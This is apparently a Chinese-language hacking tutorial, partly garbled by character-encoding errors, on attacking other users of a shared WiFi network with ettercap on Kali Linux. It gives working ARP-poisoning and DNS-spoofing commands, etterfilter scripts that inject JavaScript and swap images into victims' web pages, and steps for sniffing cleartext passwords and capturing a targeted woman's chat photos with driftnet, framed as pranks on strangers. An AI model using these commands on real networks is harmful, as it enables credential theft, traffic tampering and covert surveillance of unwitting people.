前言：

作為單身狗，你就甘心拿著筆記本蹭著垃圾WiFi聊天刷微博嗎？

來(lái)自單身狗的怨念告訴我們：不，我們要搞事情！?。。ú渲眉埖腤iFi順手調(diào)戲之，才是王道~）

做案工具：

Kali Linux（咳咳，開(kāi)始。。。）

正文：

1、首先是安裝個(gè)ettercap

sudo?apt-get?install?ettercap

2、咱們來(lái)彈個(gè)窗吧~

這個(gè)我們一般用alert的filter腳本

if(ip.proto==TCP&&tcp.dst==80){

if(search(DATA.data,"Accept-Encoding")){

replace("Accept-Encoding","Accept-Rubbish!");

#note:replacementstringissamelengthasoriginalstring

#msg("zapped?Accept-Encoding!\n");

}

}

if(ip.proto==TCP&&tcp.src==80){

replace("","alert("hello,ichunqiu!");");

replace("","alert("hello,ichunqiu!");");

msg("OK!!\n");

}

3、先編譯成程序識(shí)別的文件

etterfilter?alert.filter?-o?alert.ef

4、然后在命令中加載(實(shí)際測(cè)試命令行有bug，請(qǐng)?jiān)趫D形化界面使用ettercap -G)

ettercap?-T?-q?-i?eth0?-F?alert.ef?-M?arp:remote?-P?dns_spoof?///?///

5、然后當(dāng)妹子打開(kāi)瀏覽器上個(gè)網(wǎng)頁(yè)就。。

6、當(dāng)然也可以替換網(wǎng)頁(yè)中的圖片，比如換了百度的logo，但這并沒(méi)有好大意義。

if(ip.proto==TCP&&tcp.dst==80){

if(search(DATA.data,"Accept-Encoding")){

replace("Accept-Encoding","Accept-Rubbish!");

#note:replacementstringissamelengthasoriginalstring

#msg("zapped?Accept-Encoding!\n");

}

}

if(ip.proto==TCP&&tcp.src==80){

replace("img?src=","img?src=http://pic2016.5442.com:82/2016/0909/45/2.jpg!960.jpg;");

replace("IMG?SRC=","img?src=http://pic2016.5442.com:82/2016/0909/45/2.jpg!960.jpg");

msg("ok!!\n");

}

當(dāng)然你可以來(lái)玩些其他的東西~

1、想邪惡的抓取妹子某些網(wǎng)站的某些明文密碼嗎？

ettercap嗅探吧

ifconfig得到kali的網(wǎng)卡，例：eth0，然后

sudo?ettercap?-i?eth0?-Tq?-M?arp:remote?///?///

比如說(shuō)wordpress博客明文密碼被截取

2、想給妹子推送表白網(wǎng)頁(yè)嗎

這里用到DNS劫持

先搭建個(gè)表白網(wǎng)頁(yè)，如在：192.168.1.102

修改ettercap的DNS配置文件

sudo?vim?/etc/ettercap/etter.dns

最后的注釋上面加上

*?A?192.168.1.102

即把所有域名解析到這個(gè)ip

然后加載dns_spoof插件開(kāi)始欺騙

ettercap?-T?-i?wlan0?-q?-P?dns_spoof?///?///

為什么我是單身狗，因?yàn)槲揖退鉊NS劫持也沒(méi)有表白?。?！

3、想截取妹子的社交照片嗎

這用ettercap配合driftnet是極好的

還是先來(lái)嗅探

sudo?ettercap?-i?eth0?-Tq?-M?arp:remote?///?///

然后

sudo?driftnet?-i?eth0?-b?-a

解釋下這幾個(gè)參數(shù)

-i 監(jiān)聽(tīng)網(wǎng)卡

-b 聲音提醒

-a 保存圖片（這樣的話圖片不會(huì)顯示在）

-d 圖片保存目錄，例：driftnet -i eth0 -b -a -d /pic

看圖，誤差在于緩存的圖片不再加載，我測(cè)試聊天記錄圖片也被讀取了。。這個(gè)比較6

文中所講都為毒化整個(gè)內(nèi)網(wǎng)，測(cè)試需要謹(jǐn)慎，有可能會(huì)造成整個(gè)內(nèi)網(wǎng)網(wǎng)絡(luò)異常，如果你在辦公室，不怕被打死，可以試試。